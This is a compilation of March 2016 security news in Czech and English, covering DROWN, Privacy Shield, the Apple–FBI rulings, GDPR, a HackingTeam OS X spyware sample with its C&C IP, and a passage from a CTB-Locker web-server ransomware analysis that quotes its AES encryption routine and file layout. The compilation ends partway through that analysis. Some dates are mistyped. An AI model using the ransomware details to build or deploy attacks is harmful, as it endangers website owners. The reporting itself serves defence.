If you want to receive more details on the attacks give a look to the paper “DROWN: Breaking TLS using SSLv2” or give a look to the interesting post published by Matthew Green, a professor at Johns Hopkins University.


Chrání EU dostatečně naše data? Podle muže, který „porazil Facebook“ ne…

2.3.2016 Bezpečnost
Evropská komise zveřejnila detaily dohody o ochraně dat, uzavřené s USA, tzv. Privacy Shield. „Štít“ nahrazuje dohodu známou jako Safe Harbor, kterou loni v říjnu smetl ze stolu Soudní dvůr Evropské unie, a nastavuje rámec pro přenos osobních dat Evropanů do USA.

Dohoda má zajistit, že osobní data občanů Evropské unie budou v zámoří chráněna stejným způsobem jako v Evropě, tedy jako dle unijního práva. Než nabude platnosti, mohou se k ní ještě členské státy EU, jakož i zástupci států pro ochranu dat, vyjádřit.

Její součástí je mimo jiné závazek k vytvoření postu ombudsmana pro stížnosti občanů EU v souvislosti se sledováním jejich komunikace a internetových aktivit ze strany USA.

Na dohledu nad dodržování pravidel se přitom mají podílet i společnosti sdružené pod hlavičkou DigitalEurope, jako jsou Apple, Google či Microsoft.

„Naše společnosti se zavazují k vysokému stupni ochrany dat během zaoceánských přenosů a také k rychlému zavedení nových pravidel,“ uvedl John Higgins, generální ředitel DigitalEurope.

„Privacy Shield poskytne silnou ochranu soukromí a zákonné jistoty pro podnikatele, a zároveň prohloubí vzájemnou důvěru mezi Amerikou a Evropou,“ uvádí za „druhou stranu“ pro změnu Computer and Communications Industry Association.

Ne každého však nová dohoda uspokojuje. Výhrady má například rakouský právník Max Schrems, který ochranu osobních dat kritizuje dlouhodobě a jehož soudní bitva s Facebookem, ve finále vedla ke konci Safe Harbor.

„Evropská unie a USA se snaží zkrášlit prase vrstvami rtěnky, ovšem klíčové problémy zůstávají nevyřešené,“ nebere si servítky.

A upozorňuje například na to, že i navzdory dohodě mohou zámořské tajné služby sledovat evropské občany v celkem šesti vymezených případech, například při podezření z terorismu či špionáže.

„USA tak vlastně otevřeně přiznávají, že porušují pravidla Evropské unie přinejmenším v šesti případech,“ poukazuje Schrems.

Dokument k Privacy Shield je zatím přístupný pouze anglicky, v případě zájmu si jej však můžete přečíst zde.


DROWN Attack — More than 11 Million OpenSSL HTTPS Websites at Risk
1.3.2016 Computer Attack
A new deadly security vulnerability has been discovered in OpenSSL that affects more than 11 Million modern websites and e-mail services protected by an ancient, long deprecated transport layer security protocol, Secure Sockets Layer (SSLv2).
Dubbed DROWN, the highly critical security hole in OpenSSL was disclosed today as a low-cost attack that could decrypt your sensitive, secure HTTPS communications, including passwords and credit card details…
...and that too in a matter of hours or in some cases almost immediately, a team of 15 security researchers from various universities and the infosec community warned Tuesday.
Here’s what the security researchers said:
"We've been able to execute the attack against OpenSSL versions that are vulnerable to CVE-2016-0703 in under a minute using a single PC. Even for servers that do not have these particular bugs, the general variant of the attack, which works against any SSLv2 server, can be conducted in under 8 hours at a total cost of $440."
What is DROWN Attack? How it Abuses SSLv2 to attack TLS?
DROWN stands for "Decrypting RSA with Obsolete and Weakened eNcryption."
DROWN is a cross-protocol attack that uses weaknesses in the SSLv2 implementation against transport layer security (TLS), and that can "decrypt passively collected TLS sessions from up-to-date clients."
While latest versions don't allow SSLv2 connections by default, administrators sometimes, unintentionally override those settings in an attempt to optimize applications.
"You’re just as much at risk if your site’s certificate or key is used anywhere else on a server that does support SSLv2," security researchers noted. "Common examples include SMTP, IMAP, and POP mail servers, and secondary HTTPS servers used for specific web applications."
DROWN attack could allow an attacker to decrypt HTTPS connections by sending specially crafted malicious packets to a server or if the certificate is shared on another server, potentially performing a successful Man-in-the-Middle (MitM) attack.
How Deadly is OpenSSL DROWN Attack?
drown-attack
More than 33 percent of all HTTPS servers are vulnerable to DROWN attack.
Although the critical flaw affects as many as 11.5 Million servers worldwide, some of Alexa's top websites, including Yahoo, Alibaba, Weibo, Sina, BuzzFeed, Flickr, StumbleUpon, 4Shared and Samsung, are vulnerable to DROWN-based MitM attacks.
Besides the open-source OpenSSL, Microsoft's Internet Information Services (IIS) versions 7 and earlier, as well as prior to 3.13 versions of the Network Security Services (NSS) Cryptographic library built into many server products are also open to DROWN attack.
How to Test DROWN OpenSSL Vulnerability?
You can find out if your website is vulnerable to this critical security hole using the DROWN attack test site.
However, the good news is that academic researchers uncovered the DROWN security hole and a patch for the vulnerability has already been made available with an OpenSSL update today.
The Bad news is that the DROWN attack can conduct just under a minute to exploit and now that the bug has been disclosed, it may be actively used by hackers to attack servers.
Here’s How to Protect Yourself:
OpenSSL 1.0.2 users are strongly advised to upgrade to OpenSSL 1.0.2g and OpenSSL 1.0.1 users are recommended to upgrade to OpenSSL 1.0.1s. And if you are using another version of OpenSSL for security, you should move up to the newer versions 1.0.2g or 1.0.1s.
In order to protect yourself against the DROWN attack, you should ensure SSLv2 is disabled, as well as make sure that the private key isn’t shared across any other servers.
Those already vulnerable to DROWN attack do not need to re-issue certificates but are recommended to take action in order to prevent the attack immediately.
SSLv2 dates back to the 1990s-era and is enabled accidentally or automatically while setting up a new server, which makes DROWN attacks work. It’s due to the support of weak ciphers that were added to all versions of SSL and TLS prior to 2000 as part of United States government's export regulations.
In fact, "secure" servers can also be hacked because they are on the same network as vulnerable servers. By using the Bleichenbacher attack, private RSA keys can be decrypted, which results in unlocking "secure" servers that use the same private key.
You can find more technical details and a list of the top vulnerable websites on the DROWN Attack website.
In addition, Matthew Green, a professor at Johns Hopkins University and famous cryptographer, has also published a blog post explaining how DROWN works.


Waiting for a court ruling, a New York Judge rejected FBI request to unlock an iPhone
1.3.2016 Apple

The federal magistrate Judge James Orenstein has ruled in favor of Apple, rejecting the FBI request to unlock an iPhone.
In the last weeks, we have followed the dispute between Apple and FBI regarding the possibility to unlock the iPhone used by one of the San Bernardino shooters.

The FBI required Apple to modify the iOS operating system running on the terrorist’s iPhone by creating a specific update to push into the device and that allows to disable security measures.

News of the day is the victory obtained by the Apple company in court against the Federal Bureau of Investigation, the federal magistrate Judge James Orenstein has ruled in favor of Apple, rejecting the request to oblige the giant of Cupertino to help the feds in accessing data stored from a locked iPhone in another criminal case.

The ruling was issued on Monday by the Judge Orenstein for the Eastern District of New York as part of the criminal case against Jun Feng, a man who was pleading guilty in October last year to drug charges.

FBI against Apple judge ruling
Also in this case, the authorities seized the iPhone of the accused, but they were not able to access its content. The Drug Enforcement Administration (DEA) and the FBI decided to request the judgment of the court to obtain an order requiring Apple to unlock the device.

The law enforcement agencies invoked the “the authority of the All Writs Act of 1789,” an old law that states US authorities could bypass the iPhone’s security measures.

Orenstein rejected the request and argued that the government can not misuse the All Writs Act to force private companies to help access data stored in a locked device.
“As set forth below, I conclude that in the circumstances of this case, the government’s application does not fully satisfy the statute’s threshold requirements: although the government easily satisfies the statute’s first two elements, the extraordinary relief it seeks cannot be considered “agreeable to the usages and principles of law.” In arguing to the contrary, the government posits a reading of the latter phrase so expansive – and in particular, in such tension with the doctrine of separation of powers – as to cast doubt on the AWA’s constitutionality if adopted.” wrote Orenstein.

“Moreover, I further conclude that even if the statute does apply, all three discretionary factors weigh against issuance of the requested writ, and that the Application should therefore be denied as a matter of discretion even if it is available as a matter of law”

The All Writs Act isn’t the unique law invoked in this case, another important law, the Communications Assistance for Law Enforcement Act (CALEA) forbids any interference by government.

Waiting for a final rule for the San Bernardino, Apple is going on in its personal fight in defense of the users’ privacy. It has been reported that the company is already working on a new iPhone that is impossible to hack, even by Apple experts.


New York Judge Rules FBI Can't Force Apple to Unlock iPhone
1.3.2016 Apple
Apple Won a major court victory against the Federal Bureau of Investigation (FBI) in an ongoing legal battle similar to San Bernardino.
In a New York case, a federal magistrate judge has ruled in favor of Apple, rejecting the U.S. government’s request to force Apple to help the FBI extract data from a locked iPhone.
This ruling from United States Magistrate Judge James Orenstein for the Eastern District of New York is a significant boost to Apple’s pro-privacy stance to resist the agency’s similar efforts over unlocking iPhone 5C of an alleged San Bernardino terrorist.
The ruling [PDF] was issued on Monday as part of the criminal case against Jun Feng, who was pleaded guilty in October last year to drug charges.
The Drug Enforcement Administration (DEA) seized Feng’s iPhone 5 last year, but even after consulting the FBI, it was unable to access the iPhone. According to both the DEA and FBI, it’s impossible for them to overcome the security measures embedded in Apple’s iOS.
Thus, the government filed a legal motion seeking a court order requiring Apple to help in the investigation "under the authority of the All Writs Act of 1789" – the same old law the FBI is invoking in the San Bernardino case – so that the government could bypass the iPhone’s passcode security.
However, the company objected the order, noting that there were nine more criminal cases currently pending in which the U.S. government was seeking a similar court order.
Orenstein also disagrees to the government request for this ruling because it involved the wide interpretation of the All Writs Act that has been used to force private companies, like Apple, to comply with government requests for user information.
Ultimately, Judge Orenstein argued that the government can not misuse the All Writs Act to compel private companies to help extract information from locked devices that the government wants.
Here’s what Orenstein writes:
"The government posits a reading…so expansive—and in particular, in such tension with the doctrine of separation of powers—as to cast doubt on the All Writs Act’s constitutionality if adopted."
A different law, named the Communications Assistance for Law Enforcement Act (CALEA), explicitly forbids the type of interference government requested in this and the San Bernardino case.
What’s worth notable is that in the San Bernardino case, the FBI requires Apple to create a whole new mobile operating system for the terrorist’s iPhone, which is an even greater demand the law enforcement is pushing on Apple, than in this drug case.
However, the decision for the San Bernardino case is still pending. Apple is continuously fighting its legal battle against the FBI, so let's see who’ll win this battle over privacy: Apple or The FBI? What do you think? Know us in the comments below:


Two Years to General Data Protection Regulation Compliance
1.3.2016 Safety

The General Data Protection Regulation (GDPR) governs the use and privacy of EU citizens’ data and the Data Protection Directive governs the use of EU citizens’ data by law enforcement.
EU Data Protection Reform was put forward in January 2012 by the European Commission to make Europe fit for the digital age. At the last days of 2015, an agreement was found with the European Parliament and the Council, following final negotiations between the three institutions. This reform consists of the General Data Protection Regulation (GDPR), that governs the use and privacy of EU citizens’ data, and the Data Protection Directive, that governs the use of EU citizens’ data by law enforcement.

The General Data Protection Regulation (GDPR) as one of the instruments of this reform has finally been agreed after three years of discussion at many levels. It will replace the current Directive and will be directly applicable in all Member States without the need for implementing national legislation. According to European Commission:

“The General Data Protection Regulation will enable people to better control their personal data. At the same time modernised and unified rules will allow businesses to make the most of the opportunities of the Digital Single Market by cutting red tape and benefiting from reinforced consumer trust.”
The new rules will come into force most likely in the first half of 2018. During the two-year transition phase, the Commission will inform citizens about their rights and companies about their obligations.

Therefore, companies have the opportunity to comply with the new legislation in two years transition time. It is suggested to take on the GDPR readiness initiative before the deadline approaches.

General Data Protection Regulation - protecting data

GDPR has considered a hefty fine for some infringements of up to 4% of annual worldwide turnover. The financial impact of the GDPR enforcement on businesses makes it clear why data protection issues must be considered more deeply in executive level of organizations unless this issue has been addressed earlier and there is an allocated budget for compliance with GDPR, buy-in from top management, and a designated roadmap, processes, and people that ensure the organization will meet the regulation in two-year’s time frame.

There are two building blocks for compliance with GDPR. Firstly, a map of data flow that visualize where data comes entered the organization and where it leaves the corporate perimeter. An independent privacy analyst, Chiara Rustici emphasizes that mapping data flow is not just mapping data storage, but data in transit, too.

“GDPR meaning of “data processing” also includes retrieving, consulting, organizing, structuring, aligning, combining, disseminating, disclosing by transmission or soft-deleting data as well as collecting, storing and destroying it,” She said.

Secondly, organization-wide awareness of data protection principles is an important necessity that can happen with the help of the HR or T&D department. It might require a year of campaigning to get everyone realize their role as “data processors” and “data controllers”. In addition, it takes considerable time to embed new data architecture into business and get everyone familiarized with it.

While two years seem a long time away, but organizations should move towards the compliance and start implementing required changes without undue delay.

Let’s close with the timeline of the EU Data Protection Regulation

January 2012 EC Vice-President, Commissioner Viviane Reding, published proposals to reform European data protection rules. This included a draft revised Data Protection Regulation.
May 2012 European Parliament committees began an exchange of views on the draft revised Data Protection Regulation.
July 2012 The first European Parliament working document was produced by lead rapporteur – MEP Jan Philipp Albrecht of the LIBE committee.
October-November 2012 The European Parliament led an inter-parliamentary hearing with national parliaments.
January 2013 A draft report and mark-up of the proposed regulation, based on earlier working documents, was released by Jan Philipp Albrecht.
March 2013 Opinions on Albrecht’s report and revised draft due from all other European Parliament advisory committees.
Autumn 2013 Informal negotiations between the European Parliament and the Council of the European Union. In October the LIBE Committee voted on a compromise text.
March 2014 The EU Parliament ran a plenary vote in first reading of the draft Regulation. and adopted the LIBE Committee’s compromise text.
May 2014 The Council met and produced a report. They reached a partial general approach on specific articles of the GDPR and held an orientation debate on the “one stop shop” mechanism.
October 2014 The Council reached a partial general approach on Chapter IV of the GDPR
March 2015 The Council reached a partial general approach on Chapters II, VI and VII.
Spring 2015 The Council continued to work at a technical level.
June 2015 The Council released their general approach. Trilogue negotiations between the three institutions are ongoing.
24 June Kick off trilogue meeting
14 July Second trilogue
17 December 2015 The EU General Data Protection Regulation was agreed.
2018 Revised Data Protection Framework is expected to come into force.


Sandboxing Sophosu dokáže zablokovat i pokročilé hrozby

1.3.32016 Zabezpečení
Své řešení Email Appliance rozšířil Sophos o Sandstorm, technologii sandboxingu, která podle něj umožňuje detekci, zablokování i vyřešení i sofistikovaných a neustále se měnících hrozeb.

Sandstorm zajišťuje ochranu proti pokročilým hrozbám typu APT (advance persistent threat) i proti malwaru využívajícímu dosud nezveřejněné zranitelnosti (tedy tzv. zero-day threat).

Současný malware je podle Sophosu navržený tak, aby útočil nenápadně a pomalu a zůstal běžnými prostředky neodhalený, přičemž k zabránění, nebo alespoň oddálení detekce využívá polymorfní i maskovací techniky.

Sandstorm využívá cloudovou technologii, která tyto typy hrozeb izoluje a řeší ještě před jejich proniknutím do podnikové sítě. IT manažeři navíc mají k dispozici podrobné přehledy o chování hrozeb i výsledcích analýz, díky kterým mohou v případě potřeby dále zkoumat jednotlivé bezpečnostní incidenty a přijímat odpovídající opatření.

Technologie Sandstorm tak představuje další vrstvu pro bezprostřední detekci i ochranu. Běžné technologie jsou zpravidla velmi nákladné a pro implementaci i monitoring vyžadují další znalosti z oblasti bezpečnosti. To prý v případě nové technologie Sophosu neplatí.

Sandstorm přitom identifikuje potenciálně nebezpečné chování napříč různými operačními systémy včetně Windows, Mac i Android, a to ve fyzických i virtualizovaných prostředích, v síťové infrastruktuře, v mobilních aplikacích, v elektronické poště, v PDF i wordových dokumentech i ve více než dvou desítkách souborů dalších typů.

Novinka je k dispozici i jako rozšíření řešení pro ochranu webů Web Appliance, které kontroluje obsah webových stránek a blokuje i nejnovější webové hrozby, a také v rámci systému UTM 9.4.


New HackingTeam OS X RCS spyware in the wild, who is behind the threat?
1.3.2016 Apple

A new OS X sample of the Hacking Team RCS has been detected in the wild, who is managing it? Is the HackingTeam back?
A group of malware researchers has discovered a new strain of Mac malware undetected my most security firm, but more intriguing is the speculation that the malicious code may have been developed by the Italian security firm HackingTeam.

Pedro Vilaça, a security researcher at SentinelOne, has published an interesting post titled “The Italian morons are back! What are they up to this time?” that analyzes a sample of OS X RCS recently received by the expert. Remote Control System, aka RCS, is the surveillance software developed by the Italian firm and used by a large number of government and intelligence agencies worldwide.

Hacking Team RCS alleged clients

The sample was uploaded on February 4 to the VirusTotal which at the time confirmed that the malware wasn’t detected, meanwhile at the time I’was writing it has a detection rate of 15/55.

HackingTeam Mac OS RCS 2016 Virus Total

)The analysis of the new sample received by Vilaça revealed that the installer was last updated in October or November, and the configuration date for this sample is October 2015, a few months after the HackingTeam hack.

“First we locate the configuration file encryption key and then decrypt it. There we can find the configuration dates for this sample, 2015-10-16, confirming that this is indeed a post hack sample. The C&C server IP for this sample is 212.71.254.212. It’s already down and I didn’t verified if it was up before starting to tweet about this sample on last Friday” states Vilaça.

Still,Vilaça used the Shodan search engine and VirusTotal to perform further researches on the C&C server, he discovered that the machine referenced by this OS X RCS sample was still active in January.

What happened to HackingTeam after the clamorous data breach? At the time they promised to release a new version that they were telling was not affected by the hack. Is this really true?

The company announced to release a new version of its surveillance software, but the analysis of the source code of this new sample suggests that is has been compiled out of the leaked source code base, and apparently it hasn’t introduced new improvements.

“I can guarantee you that this sample code is coming from that code base, up to the last commit (there are probably newer commits after the leak). HackingTeam appears to have resumed their operations but they are still using their old source code for this. Of course there is a question of are they using both old and the new promised source code or were they just lying about it and resumed operations with old code since they are probably on a shortage of engineering “talent”? This is definitely a question their customers will have to ask them ;-).” continues the expert.

The expert concluded that the new strain of Mac malware is a very fresh sample that demonstrates that the HackingTeam is still alive and that is is operating under cover.

“HackingTeam is still alive and kicking but they are still the same crap morons as the e-mail leaks have show us,” Vilaça wrote. “If you are new to OS X malware reverse engineering, it’s a nice sample to practice with. I got my main questions answered so for me there’s nothing else interesting about this. After the leak I totally forgot about these guys :-).”

Another interesting analysis of this new sample of the RCS spyware has been published by Patrick Wardle, a cyber security expert at Synack. Wardle explained that the new sample is based on the old HackingTeam RCS code, but implements sophisticated techniques to evade detection and analysis.

Last summer, at Blackhat Wardle gave a presentation entitled Writing Bad @$$ Malware for OS X that provided suggestions as to how OS X malware could be improved, including the use of Apple’s native encryption scheme to protect malicious binaries.

“Diving in, the first thing we notice is that it is encrypted with Apple’s native OS X encryption scheme.” wrote Wardle. “… it’s nice to finally see some OS X malware that uses Apple’s native OS X encryption scheme, as well as custom packers. “

The expert noticed that the installer was “packed” with this technique to make hard reverse engineering and analysis.

At this point, there are two hypotheses on the origin of the sample:

Someone is maintaining and updating the code leaked in the HackingTeam hack.
HackingTeam is back, but it is still using old RCS code with a few improvements.
Let me close with the last update provided by Vilaça in his analysis.

“I just found some unique code in this dropper. This code checks for newer OS X versions and does not exist in the leaked source code. Either someone is maintaining and updating HackingTeam code (why the hell would someone do that!?!?!) or this is indeed a legit sample compiled by HackingTeam themselves. Reusage and repurpose of malware source code happens (Zeus for example) but my gut feeling and indicators seem to not point in that direction.”


Facebook a Twitter v nebezpečí? Islámský stát vyhrožuje

1.3.2016 Sociální sítě
Vedoucí pracovníci sociálních sítí se stali novým terčem bojovníků samozvaného Islamského státu. Důvodem jsou pokračující snahy o narušení jeho komunikačních a náborových kanálů.

Poprvé se teroristická skupina, zřejmě pod vlivem pokusů sociálních sítí zamezit extremistické komunikaci, odhodlala k přímým výhružkám na výkonné ředitele Facebooku a Twitteru.

V pětadvacetiminutovém videu nazvaném „Flames of the Supporters“ (Ohně přívrženců), publikovaném skrze ruský instant messaging software Telegram, se nacházejí fotografie spoluzakladatele Facebooku Marka Zuckerberga a CEO Twitteru Jacka Dorseyho s digitálně vloženými dírami od kulek. Video zveřejnila divize Sons Caliphate Army, což je domnívaná hackerská skupina Islámského státu.

Kromě toho teroristé zesměšnily snahy sociálních sítí blokovat teroristické skupiny od užívání svých služeb. Ve videu se objevují zmínění hackeři, vkládající propagandu a chlubící se, že hacknuli více než 10 000 facebookových účtů a přes 5000 twitterových profilů.

Videa si poprvé všiml časopis Vocativ, který též ohlásil, že na konci videa je učiněna přímá výhružka Zuckerbergovi a Dorseymu.

„Každý den hlásíte, že blokujete mnoho našich účtů, a k vám my říkáme: To je vše, co umíte?“ Vysmívají se islamističtí hackeři skrze text na videu. „Nedosahujete naší úrovně… když zavřete jeden účet, my si jich na oplátku deset vezmeme a brzy budou vaše jména smazána z vašich stránek, s vůlí Alláhovou, a vy poznáte, že to, co říkáme, je pravda.“

Facebook i Twitter se odmítly k videu vyjádřit. Obě společnosti však daly najevo, že i nadále budou bránit teroristickým skupinám v užívání svých služeb.

Zuckerberg se vyjádřil podobně například na letošním Mobile World Congressu v Barceloně, kdy prohlásil, že nechce, aby teroristé užívali Facebook k přilákání a výcviku nových rekrutů, ani k opěvování útoků.

Twitter zase v únorovém příspěvku na vlastním blogu sdělil, že zablokoval přes 125 tisíc účtů od poloviny roku 2015, a to jen za vyhrožování či za podporu terorismu – většinou souvisejících s Islámským státem. Společnost také vyjádřila snahu o lepší a rychlejší kontrolu oznámení o teroristech užívajících její síť.

„Odsuzujeme užívání Twitteru k podpoře terorismu a pravidla Twitteru jasně říkají, že tento druh chování, stejně jako jakékoli násilné výhružky, není na naší službě povolen,“ napsala společnost v příspěvku.

S viditelnými pokusy obou sociálních sítí o potlačení schopnosti IS fungovat na sítích není překvapivé, že teroristé vrací úder, tvrdí Dan Olds, analytik pro The Gabriel Consulting Group.

„Oba, Zuckerberg i Dorsey, vedou silné sociální sítě, které hrály důležitou roli v náborových snahách Islamského státu,“ řekl Olds. „Když se tyto společnosti snaží IS vyřadit ze hry, není překvapením, že ten odpoví výhružkami.“

Poslední výhružky ovšem zcela zavrhl a prohlásil, že nic nezmění na snahách Facebooku a Twitteru.

„Šlo by však o úplně jinou situaci, kdyby se udál fyzický, organizovaný útok na jednu ze společností nebo její zaměstnance,“ pokračuje Olds. „Úspěšný útok by bohužel mohl věci dost změnit. Ale myslím, že obě společnosti pravděpodobně zvýšily zabezpečení ve světle těchto výhružek; takže provést úspěšný útok by určitě nebylo snadné.“

Jeff Kagan, nezávislý IT analytik, řekl, že předpokládá zvýšení zabezpečení u obou společností, ale nemá dojem, že by se změnilo i něco dalšího.

„Problém je, že nevíme, co brát vážně, a co ne,“ řekl. „Domnívám se, že pokud toto je cesta, jíž se bude situace dál ubírat, nezbývá nám, než se připravit a pokračovat dál v této nové realitě.“

Analytik Zeus Kerravala souhlasí: „Jak Facebook, tak Twitter jsou velké nástroje náboru pro Islámský stát, takže Zuckerberg a Dorsey bezprostředně ohrožují jeho růst.“


Policie si došlápla na nelegální weby. Razie proběhla v sedmi zemích

1.3.2016 Bezpečnost
Rozsáhlou razii proti provozovatelům a uživatelům nelegálních internetových stránek provedla minulý týden policie v sedmi evropských zemích. Prohledala 69 bytů a firem a zadržela devět podezřelých. S odvoláním na německý Spolkový kriminální úřad (BKA) o tom informovala agentura DPA.
Koordinovaná akce se uskutečnila minulé úterý a středu kromě Německa také v Bosně a Hercegovině, Švýcarsku, Francii, Nizozemsku, Litvě a Rusku. Policisté se při akci zaměřili na obchod se zbraněmi, drogami, falšovanými penězi a dokumenty provozovaný prostřednictvím internetových platforem.

Někteří ze zadržených jsou kromě obchodování podezřelí rovněž z toho, že záměrně infikovali cizí počítače škodlivými programy, kradli důvěrná data jako například informace k bankovním účtům a že nabízeli ilegálně streamovací služby či návody na páchání trestných činů.

Hlavním podezřelým je podle německé policie 27letý občan Bosny a Hercegoviny, který je od minulé středy ve vazbě. Od roku 2012 hrál údajně klíčovou roli při provozu nelegálních stránek. Tři Němce a dva Syřany, kteří s ním spolupracovali, zadrželi policisté v Německu. Zabavili u nich množství počítačů a zbraní, celkem téměř 40 kilogramů drog a značnou hotovost.


Úřady nemohou Apple nutit, aby odkódoval iPhone, míní soudce

1.3.2016 Mobilní
Americké ministerstvo spravedlnosti nemůže nutit počítačový gigant Apple, aby Federálnímu úřadu pro vyšetřování (FBI) umožnil přístup k datům v iPhonu při vyšetřování drogového případu v Brooklynu. V pondělí to prohlásil newyorský soudce James Orenstein, uvedla agentura AP. Nedávno přitom soud v Kalifornii Applu nařídil, aby umožnil úřadu přístup k datům v kauze zabijáka ze San Bernardina.
Měl by Apple zpřístupnit data ve svých přístrojích úřadům v případě vyšetřování?
Loni v říjnu soudce Orenstein vystoupil s tím, že novelizovaný zákon z roku 1789, který úřad v souvislosti s vyšetřováním organizovaného zločinu používá, nelze na společnost Apple vztáhnout. Podle právníků od té doby počítačový gigant odmítl žádost o spolupráci v tomto smyslu už nejméně v šesti případech v Kalifornii, Illinois, Massachusetts a v New Yorku.

Orenstein pak podle svého přesvědčení postupuje i v dalších případech, z nichž jeden se týká i rutinního vyšetřování dealera metamfetaminu.

Přístup Applu je jeho příznivci v hojné míře podporován, kvůli kauze odblokování iPhonu střelce ze San Bernardina dokonce uspořádali několik demonstrací. Stanovisko počítačového gigantu se totiž podle nich úzce dotýká svobody každého z nich, která by byla prolomením zabezpečení kvůli získání přístupu k datům ze strany úřadů porušena.

FBI se snažila do uzamčeného iPhonu dostat celé dva měsíce. Útočník ze San Bernardina měl ale svůj iPhone nastavený tak, aby se po zadání deseti nesprávných přístupových hesel automaticky vymazal, s čímž si bezpečnostní experti z FBI evidentně nedokázali poradit.

Vyšetřovatelé proto chtějí nyní po Applu, aby jim udělal „zadní vrátka“ do systému iOS. Ten využívají nejen chytré telefony iPhone, ale také počítačové tablety iPad.

Problém je ale v tom, že implementací takového nástroje do zmiňované mobilní platformy by byla FBI schopna obejít zabezpečení prakticky jakéhokoliv iPhonu nebo iPadu v budoucnosti. A nehraje roli, zda by šlo o přístroj teroristy nebo běžného občana.


European police corps arrested operators behind darknets offering illegal products and services
1.3.3016 Crime

A coordinated operation of law enforcement agencies in 7 countries raided operators of darknets trading in illegal products and services.
A joint effort of law enforcement agencies in seven European countries (Germany, Bosnia, Switzerland, France, the Netherlands, Lithuania and Russia) allowed authorities to identify and arrest operators of darknet online platforms trading in illegal products and services, including drugs, fake IDs, weapons, and counterfeit money. According to the German authorities, nine suspects have been arrested by the police that targeted 69 homes and businesses in the seven countries.

The list of arrested suspects includes:

A 27-year-old Bosnian national which is considered the technical administrator of three darknets.
A 22-year-old German national who operated ran a trading platform specialized in the sale of illegal drugs.
Two Syrian brothers aged 19 and 28 in possess of 36 kilogrammesof amphetamine, 1.5 kg of cocaine, 2 kg of hashish and 2.3 kg of ecstasy pills.
Two German men aged 29 and 21, one of them is accused of the management of two illegal networks and an illegal streaming platform for pirated movies and sports shows.
Underground Cybercrime market - Darknets

The law enforcement seized 150,000 euros in cash and assets, servers in France, the Netherlands, Lithuania and Russia as well as several PCs and storage media, a firearm, and illegal drugs.

The German security services defined the operation as a “a major blow against the German-speaking underground economy and further proof that there is no complete anonymity on the Internet, including in the so-called darknet”.
German federal police and Frankfurt prosecutors revealed that the suspects exploited darknets to sell illegal drugs (amphetamines, cannabis, cocaine, ecstasy and heroin) and counterfeit documents from German, the Netherlands and Italy.

The criminal organization was also offering for sale stolen credit card data, online banking and webservice login credentials, and was also able to provide illegal services such as botnet for rent and hacking services.

This is another success of a shared operation of law enforcement.


CTB-Locker is back: the web server edition
1.3.2016 Zdroj: Kaspersky Virus

Cryptolockers have become more and more sophisticated, bypassing system protections and terrifying anyone in their path. TeslaCrypt, CryptoWall, TorrentLocker, Locky and CTB-Locker are only some of the malware we have protected from for the past two years. We have seen many shapes and colors of cryptolockers, but the new CTB-Locker variant says it all. The world of cybercriminals is investing in how to reinvent cryptolockers.

Before, CTB-Locker, or Onion Ransomware, differed from other ransomware in the usage of the Tor Project’s anonymity network to shield itself from takedown efforts that rely largely on static malware command and control servers. Its use of Tor also helped evading detection and blocking. Another thing that protected CTB-Locker controllers was accepting as payment only Bitcoins, the decentralized and largely anonymous crypto-currency known.

A new variant of the CTB-Locker targets web servers only, and to our knowledge it has already successfully encrypted web-root files in more than 70 servers located in 10 countries.

 

In this blogpost I will take you into the “lion’s den”, after victims were kind enough to share the cryptors that had been deployed into their web servers.

Step 1: defacement

This new variant aims to encrypt web servers and demand less than half a bitcoin as a ransom (~150 USD). If payment isn’t sent on time the ransom is doubled to approximately 300 USD. When paid, the decryption key is generated and is used to decrypt the web server’s files.

It has become clear that the web servers infected with this variant were targeted due to a security hole in their web server. Once exploited, the website is defaced. Defacement is a well-known method for hacking groups to show their victims they mean business. The most recent cases we’ve witnessed are not random, but mostly about political affiliations and cultural perspectives.

 

In this case, the defacement, which contains a replacement of the main php/html page, is used as the message carrier and contains all the means necessary for the attack to leave the right impression on the victim. We will deep-dive into it in the next steps.

It is important to mention that the original code is not deleted. It is stored safely in the web root with a different name in an encrypted state.

The message

As variants of malware of this kind are based on the simple fact that a victim cares more about his content than about paying a ransom, the authors usually leave a very detailed message for everyone to see.

The following quote is a part of the information that is left on the main page:

 

The decryption key is stored on a remote server, but the attackers were “kind enough” to allow the victim to decrypt two files free, as a sign of authenticity.

The other function that exists on the attacked website allows the victim to communicate with the attacker via chat: it requires a personal signature/code which is available for victims only.

At the moment, no decryption tool exists in the wild, thus there is no way to decrypt the files encrypted by the new CTB-Locker. The only way to remove this threat in a matter of seconds is to keep file backups in a separate location.

Although this seems like a big concern, we tend to believe that it is not. Large websites tend to have multiple versions of their content, spreading over a number of webservers. In many other cases, they are supervised and tested by professional security penetration testing firms and so are constantly under the magnifier.

Step 2: encryption process

We still don’t know how the CTB-Locker is being deployed on web servers, but there is one common thing among many of the attacked servers – they use the WordPress platform as a content management tool. WordPress contains many vulnerabilities in its non-updated versions and we already seen critical vulnerabilities presented last year. In addition, WordPress also has another weak spot – plugins. Those tiny enhancement features helps WordPress become what it is – a leader in the world of CMS. However, having third party plugins also makes the server more vulnerable to attacks, as plugin authors are not committed to any type of security measurements.

Once the malware author is inside WordPress system, he is able to replace the main website file and execute the encryption routine. The main file is renamed and saved in an encrypted state.

Two different AES-256 keys are deployed to the victim server:

create_aes_cipher($keytest) – encrypts the two files which can be decrypted free.
create_aes_cipher($keypass) – encrypts the rest of the files hosted on the server web root.
 

The two files are chosen by the authors and their names are saved in a text file.

The create_aes_cipher() accepts one parameter as the key and sends it to the standard Crypt_AES() function:

function create_aes_cipher($key) {
$aes = new Crypt_AES();
$aes-&gt;setKeyLength(256);
$aes-&gt;setKey($key);
return $aes;
}
1
2
3
4
5
6
function create_aes_cipher($key) {
$aes = new Crypt_AES();
$aes–&gt;setKeyLength(256);
$aes–&gt;setKey($key);
return $aes;
}
When encrypting the site, the script first uses the test key to encrypt the two files that will be used for free decryption. It will then generate a list of files that match specific file extensions and encrypt them using AES-256 encryption. The extensions that will be encrypted are read from the ./extensions.txt file and are currently:

 

Files that contain the following strings will be excluded from the encryption process:

“/crypt/”
“secret_”
In addition, files which are populated with data that will later assist the user with the decryption process would obviously be excluded as well.

./index.php – as described above, this file is the main door for the victim to analyze the attack and contains PHP code of the encryption/decryption routine.
./allenc.txt – contains a list of all encrypted files.
./test.txt – contains the files which are freely available for decryption.
./victims.txt – contains a list of all the files that are being encrypted or have already been encrypted.
./extensions.txt – contains the list of file extensions (see above).
./secret_ – as said, the victim is required to identify himself before the free decryption or chat is even possible.
